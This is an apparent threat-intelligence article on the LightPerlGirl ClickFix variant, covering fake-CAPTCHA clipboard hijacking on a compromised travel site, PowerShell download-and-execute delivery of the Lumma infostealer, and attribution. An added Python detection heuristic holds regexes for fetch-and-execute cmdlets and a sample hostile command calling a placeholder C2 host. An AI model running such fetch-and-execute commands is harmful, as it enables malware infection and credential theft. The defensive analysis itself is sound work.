New variant of the ClickFix malware family, LightPerlGirl, discovered on compromised WordPress website.

LightPerlGirl is a newly discovered variant of the ClickFix malware family, identified in June 2025. This variant leverages advanced social engineering tactics and stealthy execution methods to infect users, primarily delivering the Lumma infostealer payload.

Attack Vector and Infection Method

• Watering-Hole Attack: The LightPerlGirl variant was found on a compromised WordPress travel site, used as a watering hole to lure victims searching for Galapagos vacations.
• Social Engineering: Victims are presented with a fake Cloudflare CAPTCHA pop-up, instructing them to press Windows + R, then CTRL + V, and click ‘OK’. By this point, the site has already loaded a malicious, obfuscated PowerShell command into the clipboard.
• Clipboard Hijacking: The user unknowingly pastes and executes the obfuscated PowerShell code, which is then interpreted by the system to fetch and execute additional malicious code from a remote command-and-control (C2) server.

Technical Details

• In-Memory Execution: The PowerShell command is executed directly in memory, making detection by traditional antivirus and endpoint security tools more difficult.
• Obfuscation: The initial command is heavily obfuscated to evade user suspicion and automated analysis.
• Payload Delivery: The PowerShell script uses Invoke-RestMethod to contact a C2 domain, downloads further code, and executes it using Invoke-Expression. The final payload is the Lumma infostealer, which is capable of stealing sensitive data from the infected system.
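As an added example (not code from the original article), a Python triage heuristic for process-creation logs that flags the launch pattern described above: powershell.exe spawned from explorer.exe (the Win+R Run dialog) with a command line that fetches remote code via Invoke-RestMethod and runs it via Invoke-Expression, with extra weight for encoded or hidden-window launches. The log fields, weights and sample events are assumptions constructed for the demo; the host name in the sample is a placeholder, not an indicator from the article.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class ProcessEvent:
    parent: str    # parent image name (assumed field, as Sysmon/EDR would log it)
    image: str     # launched image name
    cmdline: str   # full command line

# Cmdlets (and aliases) for the fetch and execute steps the article names.
FETCH_RE = re.compile(r"\b(Invoke-RestMethod|irm|Invoke-WebRequest|iwr|DownloadString)\b", re.I)
EXEC_RE = re.compile(r"\b(Invoke-Expression|iex)\b", re.I)
# Obfuscation cues: -EncodedCommand (any short form) or a long base64-looking token.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b|[A-Za-z0-9+/]{60,}={0,2}", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
ALERT_THRESHOLD = 3  # explorer.exe parent plus fetch-and-execute already reaches this

def score_event(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Weighted heuristic: returns (score, reasons that fired); non-PowerShell -> 0."""
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    hits = []
    # Win+R hands the pasted command to the shell, so explorer.exe is the parent.
    if ev.parent.lower() == "explorer.exe":
        hits.append((1, "spawned from explorer.exe (Run dialog)"))
    if FETCH_RE.search(ev.cmdline) and EXEC_RE.search(ev.cmdline):
        hits.append((2, "remote fetch fed into Invoke-Expression"))
    if ENCODED_RE.search(ev.cmdline):
        hits.append((1, "encoded or obfuscated command"))
    if HIDDEN_RE.search(ev.cmdline):
        hits.append((1, "hidden window"))
    return sum(w for w, _ in hits), [r for _, r in hits]

def triage(events: List[ProcessEvent]) -> List[Tuple[str, int, List[str]]]:
    """Return (cmdline, score, reasons) for each event at or above the alert threshold."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            flagged.append((ev.cmdline, score, reasons))
    return flagged

# Constructed sample events; the host name is a placeholder, not an indicator from the article.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iex (irm hxxp://c2-placeholder.invalid/stage)"'),
    ProcessEvent("cmd.exe", "powershell.exe", 'powershell -c "Get-ChildItem C:\\Logs"'),
    ProcessEvent("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\demo\\notes.txt"),
]
```

Only the first sample event crosses the threshold; an administrator running the same fetch-and-execute one-liner from cmd.exe scores 2 and is not flagged, which is the trade-off the weights encode.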

Stealth and Evasion

• LOLBins Technique: ClickFix abuses legitimate Windows binaries (living-off-the-land binaries, or LOLBins) such as PowerShell to avoid detection and bypass security controls.
• Target Profile: The attack is not highly targeted, but the use of a travel site for expensive destinations may increase the likelihood of infecting well-off individuals or company executives, whose personal devices may lack enterprise-grade security.

Attribution and Ongoing Research

• Uncertain Origins: It is unclear whether the creators of Lumma infostealer are also behind LightPerlGirl, or if the malware is being distributed as part of an affiliate or malware-as-a-service operation.
• Naming: The name “LightPerlGirl” comes from a copyright notice found within the malware code.

Broader Context

• ClickFix Evolution: ClickFix has evolved from a Windows-only threat to targeting macOS, Android, and iOS, employing browser-based and drive-by techniques on those platforms.
• Adoption by Threat Actors: Both cybercriminal and state-sponsored groups, including Russia-linked APTs, have adopted ClickFix techniques for delivering various malware families.